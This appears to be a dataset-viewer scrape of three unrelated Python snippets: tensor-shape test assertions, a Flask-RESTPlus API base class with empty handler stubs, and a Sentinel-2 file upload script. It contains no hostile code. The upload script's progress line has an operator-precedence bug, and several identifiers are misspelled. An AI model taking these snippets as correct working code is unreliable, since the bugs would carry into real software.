self.assertEqual(dense.shape, (num_rows, INT_FEATURE_COUNT))
self.assertEqual(sparse.shape, (num_rows, CAT_FEATURE_COUNT))
self.assertEqual(labels.shape, (num_rows, 1))
|
from ..ServiceCore import Service
from .IAPICore import IAPI
from .routing.Router import Router
from ...conf.API.apis.APICoreConfig import APICoreConfig
from ...util.api.validators.InternalAPIValidators import InternalAPIValidator
from ...util.app.ErrorFactory.api.ArgumentValidation import ArgumentRequired,InvalidArgumentProvideed
from .IAPICore import IAPIArg
from ...util.Logging.LogFactory import LogFactory
from ...util.api.decorators.http import http_logger
# Flask framework imports
from flask_restplus import Namespace, Resource, model, fields
from flask import request
class APIArg(IAPIArg):
def __init__(self, arg, dataType):
super().__init__(arg,dataType)
self.arg=arg
self.dataType=dataType
class API(IAPI):
#region Constructor
def __init__(self,apiConfig: APICoreConfig,services: [Service],inputValidation: InternalAPIValidator):
self._supported_api_responses=[]
self.namespace_object:Namespace=None
self._service_config=apiConfig
self._setup_service_logger()
self._build_api_models()
super().__init__(
apiConfig=apiConfig,
services=services,
inputValidation=inputValidation)
self.api_validation=inputValidation
#endregion
#region Private Methods
def _setup_service_logger(self):
self.log=LogFactory(file=self._service_config.log_file,
log_level=self._service_config.log_level)
# Constructs a Flask Namespace object
def _build_namespace(self)->None:
self.namespace_object=Namespace(
name=self.build_resource_route(),
description=self.api_config().api_namespace_description)
def _build_router(self)->None:
self.route_manager=Router(routerConfig=self
.api_config()
.router_config())
# TODO
def _build_api_models(self):
if self._service_config.expected_models is None:
return
else:
return
#endregion
#region Pubic Methods
def payload_to_tuple_helper(self, payload: {})->tuple:
t = tuple()
for key in payload.keys():
p=payload[key]
t2=(p,)
t = t + t2
return t
def validate_required_args(self,req: [APIArg], passed_args: {}):
for required_arg in req:
if passed_args is None or required_arg.arg not in passed_args.keys():
raise ArgumentRequired(
arg=required_arg.arg
)
elif type(passed_args[required_arg.arg]) != required_arg.dataType:
raise InvalidArgumentProvideed(
arg=required_arg.arg,
expectedDataType=required_arg.dataType
)
def api_config(self)->APICoreConfig:
return self._service_config
def build_resource_route(self)->str:
return(f"{self.route_manager.core_route}/"
f"{self.route_manager.api_specific_resource}")
#f"{self.route_manager.api_specific_routes}")
#endregion
#region API Resource Builder
# Builds out the Flask API Resource
def build_api_resource(self)->Namespace:
APIReference = self
@APIReference.namespace_object.route(APIReference.build_resource_route())
class API_Resource(Resource):
#@APIReference.namespace_object.route(f"{APIReference.build_resource_route()}/{APIReference.route_manager.api_specific_routes['get']}")
@APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["get"])
def get(self):
pass
@APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["post"])
def post(self):
pass
@APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["patch"])
def patch(self):
pass
@APIReference.namespace_object.doc(responses=APIReference.api_config().method_docs["delete"])
def delete(self):
pass
return APIReference.namespace_object
#endregion
|
#!{PYTHON}
# example syntax: data_access_put_s2_l2.py /data/mx/sdrs
from multiply_data_access import DataAccessComponent
import logging
import os
import sys
logger = logging.getLogger('ScriptProgress')
logger.setLevel(logging.INFO)
# setup parameters
configuration_file = sys.argv[1]
start_date = sys.argv[2]
stop_date = sys.argv[3]
sdrs_dir = sys.argv[4]
provided_sdrs_dir = sys.argv[5]
dac = DataAccessComponent()
sdrs = os.listdir(sdrs_dir)
for i, sdr in enumerate(sdrs):
logger.info(f'{int((i/len(sdrs)) * 100)}-{int((i+1/len(sdrs)) * 100)}')
if not os.path.exists(os.path.join(provided_sdrs_dir, sdr)):
dac.put(os.path.join(sdrs_dir, sdr), 'S2L2')
logger.info('100-100')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.